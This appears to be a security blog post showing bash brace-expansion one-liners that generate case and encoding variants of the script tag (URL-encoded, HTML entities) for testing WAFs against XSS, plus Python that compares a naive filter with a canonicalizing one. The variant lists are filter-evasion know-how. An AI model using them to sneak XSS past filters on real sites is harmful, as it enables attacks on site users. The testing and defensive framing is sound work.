In this blog post we will see how to write a simple bash script that permutes important keywords used in XSS and SQLi payloads, in order to test whether a Web Application Firewall (WAF) catches them. Although there are great tools out there such as Crunch for creating wordlists, these simple scripts can be advantageous in certain situations.

For example, if you need to vary the case of the word ‘script’ in the <SCRIPT> tag to test a WAF against an XSS payload, the script below generates every case variation of ‘script’ by mixing the case of each character. It relies on bash brace expansion, which produces the Cartesian product of the alternatives listed in each pair of braces.

for char in {s,S}{c,C}{r,R}{i,I}{p,P}{t,T}; do echo "$char"; done

This simple bash script will output the following:

script
scripT
scriPt
scriPT
scrIpt
scrIpT
scrIPt
scrIPT
scRipt
scRipT
scRiPt
scRiPT
scRIpt

etc.

The next example is more involved: it enumerates every variant of the HTML <SCRIPT> tag in which each character is written as plain ASCII, URL (percent) encoding, an HTML hexadecimal entity or an HTML decimal entity.

for char in {'<','%3C','&#x3C;','&#60'}{s,S,'%73','&#x73;'}{c,C,'%63','&#x63;'}{r,R,'%72','&#x72;'}{i,I,'%69','&#x69;'}{p,P,'%70','&#x70;'}{t,T,'%74','&#x74;'}{'>','%3E','&#x3E;','&#62'}; do echo "$char"; done

The above bash script will produce the following:

<script>
<script%3E
<script&#x3E;
<script&#62
<scripT>
<scripT%3E
<scripT&#x3E;
<scripT&#62
<scrip%74>
<scrip%74%3E
<scrip%74&#x3E;
<scrip%74&#62
<scrip&#x74;>
<scrip&#x74;%3E
<scrip&#x74;&#x3E;
<scrip&#x74;&#62
<scriPt>
<scriPt%3E
<scriPt&#x3E;
<scriPt&#62…

etc.

The complete word list generated can be found here.
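The reason these variants matter to a defender is that a filter matching the literal string <script> sees only one of them, while a filter that first canonicalizes its input (URL-decode, HTML-entity-decode, lower-case) sees all of them as the same tag. The following Python is an added example, not part of the original post: it rebuilds the same alphabet as the bash one-liner above with itertools.product and compares a naive signature against a canonicalizing one over the whole set.

```python
import html
import itertools
from urllib.parse import unquote

# Per-character alternatives, copied from the brace expansion above
# (plain ASCII, URL-encoded, HTML hex entity, HTML decimal entity).
SCRIPT_TAG_ALPHABET = [
    ["<", "%3C", "&#x3C;", "&#60"],
    ["s", "S", "%73", "&#x73;"],
    ["c", "C", "%63", "&#x63;"],
    ["r", "R", "%72", "&#x72;"],
    ["i", "I", "%69", "&#x69;"],
    ["p", "P", "%70", "&#x70;"],
    ["t", "T", "%74", "&#x74;"],
    [">", "%3E", "&#x3E;", "&#62"],
]


def script_tag_variants():
    """Enumerate every string the bash one-liner prints (4**8 of them)."""
    return ["".join(parts) for parts in itertools.product(*SCRIPT_TAG_ALPHABET)]


def canonicalize(value, max_rounds=3):
    """URL-decode then HTML-entity-decode until the string stops changing
    (bounded, so nested encodings cannot loop forever), then lower-case it."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value.lower()


def naive_match(value):
    """A literal, case-sensitive signature: exactly what the variants evade."""
    return "<script>" in value


def canonical_match(value):
    """The same signature applied after canonicalization."""
    return "<script>" in canonicalize(value)


def evasion_report():
    """Count how many generated variants each approach detects."""
    variants = script_tag_variants()
    return {
        "variants": len(variants),
        "naive_hits": sum(naive_match(v) for v in variants),
        "canonical_hits": sum(canonical_match(v) for v in variants),
    }
```

The decoder only handles the two encodings the wordlist uses; a real WAF must also normalize things like overlong UTF-8, JavaScript escapes and double encoding before matching.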

Although simple, this bash script can be edited to produce all kinds of wordlists, including plain wordlists for brute-force testing.